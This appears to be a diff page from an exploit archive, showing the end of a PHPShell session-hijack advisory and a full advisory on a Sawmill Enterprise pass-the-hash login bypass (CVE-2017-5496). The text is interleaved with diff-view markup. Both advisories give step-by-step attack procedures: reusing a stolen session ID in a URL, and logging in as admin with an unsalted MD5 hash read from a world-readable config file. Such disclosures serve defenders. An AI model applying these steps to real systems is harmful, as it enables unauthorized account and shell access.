attempting to run system command the application luckily redirects to login
|
||||
form.
|
||||
However, if a victim is actively changing directorys, reading files etc...
|
||||
attackers may still be able to read current directory and files open
|
||||
in the victims PHPShell console window.
|
||||
|
||||
|
||||
|
||||
Exploit/POC:
|
||||
=============
|
||||
|
||||
1) Login to PHPShell run commands to CD to Windows directory and run DIR
|
||||
command etc, then find and copy the PHPSESSID Cookie
|
||||
|
||||
2) Open a second browser (InternetExplorer) and access the application
|
||||
cleanly for first time using the PHPSESSID in URL.
|
||||
|
||||
e.g.
|
||||
|
||||
http://VICTIM-IP/phpshell-2.4/phpshell.php?PHPSESSID=<STOLEN-SESSION-ID>
|
||||
|
||||
You should see what the authenticated victim now sees...
|
||||
|
||||
e.g.
|
||||
|
||||
Current Working Directory:
|
||||
Change to subdirectory:
|
||||
|
||||
07/13/2009 08:51 PM 24,576 Microsoft.MediaCenter.iTv.Hosting.dll
|
||||
11/20/2010 10:24 PM 147,968 Microsoft.MediaCenter.iTV.Media.dll
|
||||
07/13/2009 08:52 PM 45,056 Microsoft.MediaCenter.ITVVM.dll
|
||||
11/20/2010 10:24 PM 56,320 Microsoft.MediaCenter.Mheg.dll
|
||||
11/20/2010 10:24 PM 114,688 Microsoft.MediaCenter.Playback.dll
|
||||
11/20/2010 10:24 PM 1,572,864 Microsoft.MediaCenter.Shell.dll
|
||||
11/20/2010 10:24 PM 241,664 Microsoft.MediaCenter.Sports.dll
|
||||
11/20/2010 10:24 PM 327,168
|
||||
Microsoft.MediaCenter.TV.Tuners.Interop.dll
|
||||
11/20/2010 10:24 PM 2,596,864 Microsoft.MediaCenter.UI.dll
|
||||
10/29/2011 12:23 AM 465,920 mstvcapn.dll
|
||||
11/20/2010 10:24 PM 88,576 NetBridge.dll
|
||||
07/13/2009 08:51 PM 106,496 RegisterMCEApp.exe
|
||||
06/10/2009 04:04 PM 129,528 segmcr.ttf
|
||||
|
||||
etc...
|
||||
|
||||
|
||||
|
||||
Network Access:
|
||||
===============
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
|
||||
Severity:
|
||||
=========
|
||||
Medium
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=============================
|
||||
Vendor Notification: No reply
|
||||
Also, the INSTALL file "Bugs? Comments? Tracker System link" is HTTP 404
|
||||
http://sourceforge.net/tracker/?group_id=156638
|
||||
February 18, 2017 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the
|
||||
information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author
|
||||
prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere. All content (c) HYP3RLINX -
|
||||
ApparitionSec
|
138
platforms/windows/webapps/41395.txt
Executable file
138
platforms/windows/webapps/41395.txt
Executable file
|
@ -0,0 +1,138 @@
|
|||
[+] Credits: John Page AKA Hyp3rlinx
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/SAWMILL-PASS-THE-HASH-AUTHENTICATION-BYPASS.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
===============
|
||||
www.sawmill.net
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
========================
|
||||
Sawmill Enterprise v8.7.9
|
||||
|
||||
sawmill8.7.9.4_x86_windows.exe
|
||||
hash: b7ec7bc98c42c4908dfc50450b4521d0
|
||||
|
||||
Sawmill is a powerful heirarchical log analysis tool that runs on every
|
||||
major platform.
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================================
|
||||
Pass the Hash Authentication Bypass
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
CVE-2017-5496
|
||||
|
||||
|
||||
|
||||
Security Issue:
|
||||
=====================
|
||||
Sawmill suffers from a classic "Pass The Hash" vulnerability whereby an
|
||||
attacker who gains access to the hashed user account passwords
|
||||
can login to the Sawmill interface using the raw MD5 hash values, allowing
|
||||
attackers to bypass the work of offline cracking
|
||||
account password hashes.
|
||||
|
||||
|
||||
This issue usually is known to affect Windows systems e.g. (NT Pass the
|
||||
Hash/Securityfocus, 1997). However, this vulnerability can also
|
||||
present itself in a vulnerable Web application.
|
||||
|
||||
Sawmill account password hashes are stored under LogAnalysisInfo/ directory
|
||||
in "users.cfg".
|
||||
|
||||
e.g.
|
||||
|
||||
users = {
|
||||
root_admin = {
|
||||
username = "admin"
|
||||
password_checksum = "e99a18c428cb38d5f260853678922e03"
|
||||
email_address = ""
|
||||
|
||||
|
||||
This config file is stored local to the Sawmill application. However, if an
|
||||
attacker gains access to a backup of the config that is
|
||||
stored in some other location that is then compromised, it can lead to
|
||||
subversion of Sawmills authenticaton process.
|
||||
|
||||
Moreover, since 'users.cfg' file is world readble a regular non Admin
|
||||
Windows user who logs into the system running sawmill can now grab
|
||||
a password hash and easily login to the vulnerable application without the
|
||||
needing the password itself.
|
||||
|
||||
|
||||
How to test?
|
||||
|
||||
|
||||
Sawmill running (default port 8988), log off Windows and switch to a
|
||||
"Standard" Windows non Administrator user.
|
||||
|
||||
1) Open "users.cfg" under Sawmills directory "C:\Program Files\Sawmill 8\LogAnalysisInfo" and copy the root_admin Admin password hash.
|
||||
|
||||
2) Go to the Sawmill login page in web browser http://VICTIM-IP:8988/ enter username 'admin' and the hash, Tada! your Admin.
|
||||
|
||||
|
||||
Finally, Sawmill passwords are hashed using vulnerable MD5 algorithm and no
|
||||
salt.
|
||||
|
||||
|
||||
e.g.
|
||||
|
||||
password: abc123
|
||||
MD5 hash:
|
||||
e99a18c428cb38d5f260853678922e03
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=====================================
|
||||
Vendor Notification: January 7, 2017
|
||||
CVE-2017-5496 assigned : January 20
|
||||
Request status : January 26
|
||||
Vendor: Fix avail later in year still no ETA
|
||||
Inform vendor public disclose date
|
||||
February 18, 2017 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
Network Access:
|
||||
===============
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
Impact:
|
||||
======================
|
||||
Information Disclosure
|
||||
Privilege Escalation
|
||||
|
||||
|
||||
|
||||
Severity Level:
|
||||
================
|
||||
High
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the
|
||||
information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author
|
||||
prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
Loading…
Add table
Reference in a new issue